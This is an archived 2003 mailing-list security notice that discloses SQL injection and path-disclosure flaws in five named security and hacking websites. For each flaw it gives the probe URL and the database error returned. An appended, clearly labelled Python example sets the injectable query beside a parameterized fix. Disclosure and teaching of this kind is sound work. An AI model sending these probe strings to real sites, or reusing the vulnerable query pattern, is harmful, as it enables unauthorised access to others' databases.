Open Source and information security mailing list archives
From: mordred at s-mail.com (Sir Mordred)
Subject: @(#)Mordred Security Notice - exploring the hacking websites

// @(#)Mordred Labs security notice - exploring the hacking websites

Release date: May 5, 2003
Author: Sir Mordred (mordred@...ail.com)

I. INTRODUCTION

It is a first security notice about the real state of web app security
with the real world examples.
In this issue we will be focusing on websites related to hacking.
Security companies and news portals will be discussed later.
For now, it would be nice to see the reaction of the community on this
issue.

Looking at this notice, one can clearly see that the combination of
ASP/PHP and relational database is very dangerous, even the
"security experts" make mistakes :-).

Surely, not all of the vulnerabilities have been found/disclosed.
For example, there was no testing for CSS vulnerabilities at all.

Note that the vulnerabilities are presented here in the following format:

* ISSUE <number> - description of the vulnerability
blank line
the url to demonstrate this vulnerability
blank line
the error message (if exists)

One last word to tripz: thanks for the help.

II. DETAILS

1) ---------------------- www.progenic.com ------------------------------

It seems that the primary goal of this website, created "for the love of
the scene", is to maintain a large collection of links to
security/hacking resources.

* ISSUE 1 - SQL injection in /vote/default.asp page

http://www.progenic.com/vote/?id=e',s

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/vote/Default.asp, line 154

* ISSUE 2 - SQL injection in /info/default.asp page

http://www.progenic.com/info/default.asp?id=.'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '.''.
/info/Default.asp, line 32

2) --------------------- www.hackinthebox.org --------------------------

<quote>
Hack In The Box is designed to facilitate discussions on security
related topics, create security awareness, and to try and provide a
comprehensive database of security knowledge and resources to the public
</quote>

Rather interesting website, the nice thing about it is that HITB opened
source code of certain parts of the website, I did not bother to look at
their source though.

* ISSUE 1 - SQL injection in /memberlist.php page

http://www.hackinthebox.org/memberlist.php?letter=A&sortby=uname,

1064: You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to use
near ' LIKE '%' ORDER BY uname,' at line 1

3) ---------------------- www.hackerscenter.com -----------------------

<quote>
The best resource for hackers and crackers: tons of tools, tutorials,
books, articles, analysis. Join our Top%0 or enjoy our Online tools!!!
</quote>

* ISSUE 1 - SQL injection in /top50/default.asp page

http://www.hackerscenter.com/top50/default.asp?id=9,'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
expression 'id=9,''.
/top50/default.asp, line 249

* ISSUE 2 - SQL injection in /downloads/download.asp page

http://www.hackerscenter.com/downloads/download.asp?id=7,&area=HACKING

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
expression 'id=7,'.
/downloads/download.asp, line 37

* ISSUE 3 - SQL injection in /articles/article.asp page

Visiting the url
http://www.hackerscenter.com/articles/article.asp?id=28
gives us back their article "Securing Windows".
However, visiting the url
http://www.hackerscenter.com/articles/article.asp?id=28111
gives us back the error page with the message
"Exception occured in /articles/article.asp, line 129".
But visiting
http://www.hackerscenter.com/articles/article.asp?id=28111+or+id=28
gives us the above article.

* ISSUE 4 - SQL injection in /articles/archive.asp

http://www.hackerscenter.com/articles/archive.asp?searchstring=SQL&field='SUBJECT

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query
expression 'Validated=True AND 'SUBJECT LIKE '%%%SQL%%%' ORDER BY
'SUBJECT DESC'.
/articles/archive.asp, line 154

4) ---------------------- www.codeingtheweb.net ------------------------

<quote>
We deal in security new, security programs and virus alers. We also have
an online messenger system, top50, forum etc. An amazing site!
</quote>

* ISSUE 1 - SQL injection in /top50/index.php page

http://www.codeingtheweb.net/top50/index.php?cid=1'\1

You have an error in your SQL syntax near '\'\\1 order by thin
DESC,ranks DESC,star DESC,thout DESC limit 0,50' at line 1

5) ---------------------- www.ebcvg.com --------------------------------

<quote>
eBCVG.com is a security portal dedicated to providing security
professionals with the knowledge and resources needed to help protect
all of their data. applications ... etc... It was developed by IT and
security experts to facilitate discussion on security related topics,
promote security awareness and to provide comprehensive and helpful
database of security.
</quote>

* ISSUE 1 - Path disclosure in /articles.php page

http://www.ebcvg.com/articles.php?id='

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL
result resource in /home/1111146160/www/web/articles.php on line 37
Unabled to read from database.

* ISSUE 2 - SQL injection in /articles.php page

Visiting the url
http://www.ebcvg.com/articles.php?id=126
gives us back the article "Copying Copy Protected CD's".
However, visiting the url
http://www.ebcvg.com/articles.php?id=12611
gives us the page with the error message "Unabled to read from database".
But the url
http://www.ebcvg.com/articles.php?id=12611+or+id=126
gives us the above article.

* ISSUE 3 - Path disclosure in /download.php

http://www.ebcvg.com/download.php?id='

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL
result resource in /home/1111146160/www/web/download.php on line 7
Warning: Cannot add header information - headers already sent by (output
started at /home/1111146160/www/web/download.php:7) in
/home/1111146160/www/web/download.php on 12

* ISSUE 4 - SQL injection in /download.php

This is almost identical to the issue 2, only the url is
http://www.ebcvg.com/download.php?id=<id number>
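
The numeric-parameter behaviour reported above for article.asp and articles.php (an unknown id fails, the same id followed by "or id=" and a known id returns the article), reproduced against an in-memory SQLite table beside a validated, parameterized lookup. This is an added example, not part of the original notice and not code from any of the listed sites; the table, sample rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for a site's article table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(28, "Securing Windows"), (30, "Constructed second row")])
    return db

def fetch_vulnerable(db, raw_id):
    # Request value pasted straight into the SQL text, so it is parsed as SQL.
    sql = "SELECT title FROM articles WHERE id=" + raw_id
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        # Returning the driver message to the client is what exposed the
        # query fragments, line numbers and paths quoted in the notice.
        return "DB error: %s" % exc

def fetch_hardened(db, raw_id):
    # 1. The parameter is an integer key: reject anything else up front.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None  # caller answers with a generic 400, no driver details
    # 2. Bind the value; it is never concatenated into the statement.
    try:
        cur = db.execute("SELECT title FROM articles WHERE id = ?",
                         (int(raw_id),))
        return [row[0] for row in cur]
    except sqlite3.Error:
        return None  # log server-side, show a generic error page

if __name__ == "__main__":
    db = make_db()
    # "+" in the query strings above decodes to a space.
    for value in ["28", "28111", "28111 or id=28", "9,'"]:
        print(repr(value), fetch_vulnerable(db, value),
              fetch_hardened(db, value))
```
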